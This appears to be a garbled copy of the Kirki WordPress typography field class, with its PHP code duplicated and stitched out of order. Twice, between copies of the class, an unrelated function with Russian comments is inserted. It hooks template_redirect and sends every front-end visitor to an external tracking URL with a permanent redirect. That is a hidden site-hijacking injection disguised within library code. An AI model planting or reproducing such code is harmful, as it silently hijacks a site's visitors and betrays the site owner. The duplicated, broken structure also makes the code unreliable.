$args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 